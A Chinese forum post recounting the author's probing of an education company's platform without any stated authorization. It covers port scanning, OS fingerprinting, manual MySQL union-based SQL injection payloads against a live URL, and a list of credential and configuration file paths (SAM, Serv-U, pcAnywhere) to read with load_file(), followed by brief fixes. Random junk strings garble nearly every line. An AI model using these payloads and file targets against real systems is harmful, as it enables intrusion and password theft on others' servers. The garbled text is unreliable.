找回密码
 立即注册
查看: 3181|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:
, u5 ?+ y  q* x4 b8 V- Y一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
8 ?6 ^7 U, l! c第一步:获取需要的信息' Y+ W6 t5 X% L2 l6 r
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。  I5 P8 P* {: q0 n
注:以下为保护特用XXX代替敏感信息6 M- j( U; f9 ]6 r6 n7 ^# Q
顺手先PING了一下他们的域名:
! j! `) q# ^2 j- W/ xping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
* w4 H4 G1 r' f$ ]1 ^: P64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms' k" {" A1 W1 Q) ], Y8 C/ {4 M6 v
顺便了解一下TTL,学好基础知识才能一路顺风:
; L  ?! z" T: s$ i) ^; nTTL:(Time To Live ) 生存时间' O' h. C+ |7 t  E0 p7 u& g2 O% x
指定数据包被路由器丢弃之前允许通过的网段数量。
" ?( Y! B7 e; I+ R# cTTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。) w% B9 m: J3 L( Z. q
使用PING时涉及到的 ICMP 报文类型
: e) V0 I1 @. d- V, E2 k  ^0 Q一个为ICMP请求回显(ICMP Echo Request)
+ ]7 N5 b3 x* K/ Q. Z" d, D一个为ICMP回显应答(ICMP Echo Reply)6 c2 g/ p# k- W% p$ G
TTL 字段值可以帮助我们识别操作系统类型。; \  k( R* Y5 G6 ?$ O& b- c
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255; n4 ~- h2 W/ L# ^% _
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64- s. S9 t3 Q5 P! t. Q" I/ j
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128/ W- r0 `. W1 a) p$ F( s, V
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32! g+ w. V: o* ]  g* s# ~4 [
当然,返回的TTL值是相同的) h1 |  f3 {& @6 s! `3 s
但有些情况下有所特殊
" f0 B- T5 O+ D. G, a% RLINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 644 H! D* l3 m0 n& R% i/ b
FreeBSD 4.1, 4.0, 3.4;
9 @" Y' s: ?, ]- p2 z* NSun Solaris 2.5.1, 2.6, 2.7, 2.8;
8 m6 W% s6 F# l* S! s" K) v6 eOpenBSD 2.6, 2.7,
& {* W2 c" ^9 T# {! ?6 y+ j# n1 ]NetBSD) m7 i5 P0 R# K
HP UX 10.20& N' q4 C/ ~/ m' |5 [4 {
ICMP 回显应答的 TTL 字段值为 2559 f1 f1 P/ L% n( c# S7 c
Windows 95/98/98SE0 k6 Y  i2 M# d: q  C3 [
Windows ME' Y) a: t/ S0 J
ICMP 回显应答的 TTL 字段值为 327 |8 l2 U2 |4 Y  i# }! c. G! M
Windows NT4 WRKS5 p$ p1 }* B( m$ k
Windows NT4 Server9 T) a, m% {; z
Windows 2000
# b( u- B2 l: n1 s$ e. c2 TWindows XP  C( c$ p* F* K
ICMP 回显应答的 TTL 字段值为 128
& U. f7 P2 B6 G  t8 p. J! o( ~这样,我们就可以通过这种方法来辨别操作系统+ }% n- e5 n0 }
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
% L% S) H- o8 k) E用NMAP扫描一下:
; j% M  z' k0 h# R* inmap -sT -O XXX.XXX.XXX.XXX
' m2 c# H) E# X5 l, ^" |如果没有装WinPcap则会弹出提示:
$ D7 V7 [: O) [! `WARNING: Could not import all necessary WinPcap functions.  You may need to upgr
$ P5 W( ]; T- f" S' b8 H4 N. Lade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
; h. U2 ]! U8 K5 R) mode — Nmap may not function completely1 H6 e  q5 I! @
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher  v: L6 G1 x# W( r% s* h
and iphlpapi.dll be installed. You seem to be missing one or both of these.  Win
' l/ `+ f9 N8 x4 r7 r/ Jpcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an! ?! q* E7 j1 K5 C& ]$ Q
d later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
! O& K3 U7 `" y; Dersions, you may be able to take iphlpapi.dll from another system and place it i' S/ L3 T0 s2 S
n your system32 dir (e.g. c:\windows\system32).
5 H- n1 F( t1 {  R2 x8 t& [6 WQUITTING!
  J0 o1 N! v; q. S到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
" n% Q2 N% j' j安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:, o0 v: L: b4 U4 K
Interesting ports on XXX.XXX.XXX.XXX:
9 X; Q8 \; S" b% a; J  ONot shown: 986 closed ports2 l$ l  @1 A5 S9 r9 V1 ?+ ^0 r. F
PORT     STATE    SERVICE
: s& z* m4 V% w2 u0 T; I21/tcp   open     ftp( Y0 |2 c3 U4 w) a, g8 o
22/tcp   open     ssh; Y8 L( }. U7 M" E* |6 ^
23/tcp   open     telnet# q5 v2 `8 P: Z# k" L+ f- c" ~
80/tcp   open     http
) W  w, i/ y4 A7 Z111/tcp  open     rpcbind
/ s* I* D( h% {$ f& ~8 ~# U# Y0 t135/tcp  filtered msrpc
, p* F; L1 Q3 z+ E( i/ R* W139/tcp  filtered netbios-ssn
9 i. S/ i' L4 x$ N- w445/tcp  filtered microsoft-ds
+ L9 V0 F; x  u# p! R5 b% w513/tcp  open     login
0 k8 m" j  U8 y! m+ p# F3 w514/tcp  open     shell
$ Z/ R  i! X! d2 C4 N593/tcp  filtered http-rpc-epmap/ o( {1 ?0 e. c" R) d( N
1720/tcp filtered H.323/Q.9311 T2 v8 K; U4 `% d4 e
3306/tcp open     mysql# j9 c: b7 S# _$ C
4444/tcp filtered krb524
3 `' a) z7 P5 i* k( E/ k) k' _' oDevice type: WAP- Y- i# t, D' c* ^& ~$ H
Running: Linux 2.4.X
2 n6 ]+ c2 A% O( }OS details: DD-WRT (Linux 2.4.35s)
% C3 g7 C0 l9 J" g, |7 \$ `/ gNetwork Distance: 13 hops/ o3 F* F/ ~- n/ c
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
3 g2 m7 N3 E3 ]! k5 X5 R% mlogin as:5 D' z/ ]7 i4 E2 y) e! o
Telnet23端口也是开着的,用telnet 命令链接一下:
# }1 i  j% K1 K  T/ u" F1 `telnet XXX.XXX.XXX.XXX9 W( @* }3 A" R/ F
提示:
' h; L$ k0 U# ]6 i# u1 }Red Hat Enterprise Linux Server release 5.2 (Tikanga), s6 X+ T8 A& a; u! ]$ K
Kernel 2.6.18-92.el5PAE on an i686/ X: ]- E( S! r6 E$ s% b
login:  k/ [6 ^: ~" `% M* n% l4 f
获取HTTP头信息:( P8 S" K4 J& G
在本地执行如下PHP代码" n8 p+ Y# P" d4 l5 E
<?php5 w# J% x$ I1 g8 p; u( L
$url = ‘XXX.XXX.XXX.XXX’;
/ O) j/ B9 e$ Lprint_r(get_headers($url));
6 V" i6 l( w0 ~9 ?# Vprint_r(get_headers($url, 1));
1 ?, j0 P) A: S, M?>& O0 U. ?9 e5 z$ Y7 t
将以上代码保存为PHP文件,执行:
/ o+ O: T7 |+ MArray ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
4 l" O0 K. Z6 O; l8 }1 `现在可以得出结论:, \' r5 X2 ^$ ]& z+ d8 `) r
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
3 e  ^7 \8 G! A  V9 z" L内核版本:Kernel 2.6.18-92.el5PAE on an i6865 h6 u1 V; a3 B$ z, A
WEB服务器版本:nginx/0.7.61
6 Q1 c* J! }, O) t. I第二步,开始测试寻找漏洞4 O. K1 K0 A) r
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。5 f9 @' y5 q0 S' A' u( i) X: ]
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
( V* b! ^% @1 j( j7 x3 L* s2、测试方法:在地址后加 and 1=1 和 and 1=2 测试0 X/ L/ f; w/ L8 K( n2 e
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常7 K4 b" {! C9 s  W6 {
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
# B' i9 H  W$ U; {恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续( `8 q& K9 U. F  o& B
3、手工注入:; ?; p! e. B' `( F
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。" ?* F3 ^3 d& Z2 E& S1 H
3.1 猜测当前表字段数0 g6 g2 ^, a0 g7 X7 S% |( u( T
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10( Z( F) s" X# w; o/ h
此处猜测有个简单的算法,都是有技巧的吗,呵呵
6 T- {; p: N; Q( I1 e( M算法简单如下:
" T/ s: |" V# z9 _9 E/ J! X) h第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
4 Q. X- ]% d3 n( i/ q第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;6 ~) d' I9 \+ b* Q
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
$ q2 b, [4 j, t以此来判断,是否过界,配合取中算法猜出字段数。1 W2 U( |5 [; |- l' I! r: P
举例:
- s. c1 Q9 s5 khttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
- h& d. R0 y% y, h  U5 Thttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
* j) F* b2 W# Z0 D# j. o& [此时3则为我们要找的字段数。
3 r- z5 j- |: O$ J: Q: W1 G$ E( P! q3.2 配合union联合查询字段在页面所位置
, T  z# ^+ q  k我们已经知道了字段数为3,此时则可以做如下操作:
" w4 q+ ]* ^' B( |9 f, dhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,33 b' l3 F6 X. E$ w! H8 [/ P# n0 Q

" J- p4 l- C6 f7 x* \这样就可以测试到哪些字段在页面上有所显示了,如图:! V- R% W: |7 n9 Q+ }
. I' l) Z* E) X2 H3 E# F. v
3.3 查敏感信息
3 p7 C$ [  {5 j7 e: m3 j; S/ ?这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
9 ?& Z* o' N; F. x. ^; p8 V! m& xhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
5 ?# s6 e$ O7 [0 O! X" v; x3.3.1 先查数据库用户、数据库名,以备后用,如图:
+ x3 C- q& m" B: U3 \& |" d5 H2 T$ B# V3 i
得到数据库用户为root、数据库名为DBxx;
4 I# k5 k) M" r  p' C3.3.2 查配置文件4 h3 E8 D: R. I% M9 g( I+ [
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。  K4 T( I: H5 C
查看文件有一定的条件限制:
+ t; U+ x$ {8 F# Z& }欲读取文件必须在服务器上5 i* X% R1 d# W
必须指定文件完整的路径
" }. A& n) j5 H6 q4 |. q; |必须有权限读取并且文件必须完全可读: c) `4 Z$ c: A! q) H' y; r
欲读取文件必须小于 max_allowed_packet
* G/ F. `0 G8 J, P+ G: xMYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。. Y/ O3 e( ^) x3 W+ |! c0 H: n
常用的一些:
/ ]2 I' X. I2 g3 `- Q: i- [0 {/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
! r" E, `% w8 U3 ^- W% K/usr/local/apache2/conf/httpd.conf
1 m! m) D8 _8 y, q9 j* F2 a  F/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置/ x1 L  l- S) k  B- r7 m
/usr/local/app/php5/lib/php.ini //PHP相关设置" {% T' e0 ?% G+ y/ z+ u& G* h
/etc/sysconfig/iptables //从中得到防火墙规则策略
3 C9 c9 r; i1 d8 z) l/etc/httpd/conf/httpd.conf // apache配置文件; P0 e; r" E( Z2 g8 T" R2 X
/etc/rsyncd.conf //同步程序配置文件% I) ?  z4 ?/ u% T4 w
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
7 K2 p4 S) Q  D# [$ K8 v5 n1 L/etc/my.cnf //mysql的配置文件' v: O% P0 N# w# N8 G) k. s6 Z
/etc/redhat-release //系统版本6 w7 N6 ^, Y6 O
/etc/issue
. C& z4 ~8 z& B1 D* ]/etc/issue.net* H, d7 f% Q8 D3 _$ b, K
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码% e* U7 D: |( w9 J. A/ f
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
, q7 s6 d, b8 q: W( S, N* Kc:\Program Files\Serv-U\ServUDaemon.ini0 z' y4 h- K; x7 H$ X
c:\windows\my.ini //MYSQL配置文件2 p% J! T- P# Y" A
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
- F- n* x6 D+ N% I等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
& N' R1 X) D1 R; O/ ^! z6 V; I. s5 Mc:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
0 A3 X) O  L8 Lc:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
8 M5 J! O8 w+ m; d- j5 F& Uc:\Program Files\RhinoSoft.com\ServUDaemon.exe
) M2 K' r' \( S1 ^- T+ H) d" lC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件* M0 {5 j4 E3 u! e
//存储了pcAnywhere的登陆密码
0 @2 A0 [4 n/ k' J, _由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。; m+ I# _; f& \$ v$ Q# R1 m; p: f
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
  H" N" n* V2 F) z7 v最后:防范措施
. ~& o8 B0 Z* Z8 i1 t  u, R1、修复PHP注入漏洞;
7 @( L- v' W0 }' @* s3 [1 z0 \6 I2、Mysql使用普通权限的用户;( C9 [6 N1 M. }2 c+ X3 U% P
3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表